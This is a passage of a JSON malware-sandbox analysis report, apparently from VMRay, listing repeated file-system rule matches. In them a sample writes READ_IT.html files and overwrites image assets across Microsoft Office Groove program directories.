Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightorange\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23743", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightorange\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Biscay\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\biscay\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23761", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\biscay\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\babyblue\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23771", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\babyblue\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Americana\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\americana\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23789", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\americana\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23799", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_23997", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24031", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24129", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\documentshare\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24159", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\documentshare\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\discussion\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24165", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\discussion\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\computers\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24175", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\computers\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24185", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24303", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24325", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DataViewIconImagesMask.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\dataviewiconimagesmask.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24360", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\dataviewiconimagesmask.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DiscussionToolIconImages.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\discussiontooliconimages.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24367", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\discussiontooliconimages.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\DiscussionToolIconImagesMask.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\discussiontooliconimagesmask.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24374", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\discussiontooliconimagesmask.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Form_StatusImage.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\form_statusimage.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24381", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\form_statusimage.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Form_StatusImageMask.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\form_statusimagemask.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24388", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\form_statusimagemask.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\GRIP.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\grip.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24395", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\grip.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\GRIPMASK.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\gripmask.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24402", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\gripmask.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\InformationIcon.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\informationicon.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24409", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\informationicon.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\InformationIconMask.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\informationiconmask.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24416", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\informationiconmask.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\LoginDialogBackground.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\logindialogbackground.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24423", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\logindialogbackground.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\LoginTool24x24Images.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\logintool24x24images.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24436", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\logintool24x24images.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\LoginTool24x24ImagesMask.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\logintool24x24imagesmask.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24443", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\logintool24x24imagesmask.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\MessageAttachmentIconImages.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\messageattachmenticonimages.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24450", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\messageattachmenticonimages.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\MessageAttachmentIconImagesMask.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\messageattachmenticonimagesmask.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24457", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\messageattachmenticonimagesmask.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\MessageHistoryIconImages.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\messagehistoryiconimages.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24464", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\messagehistoryiconimages.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\MessageHistoryIconImagesMask.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\messagehistoryiconimagesmask.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24471", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\messagehistoryiconimagesmask.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierBackground.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierbackground.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], 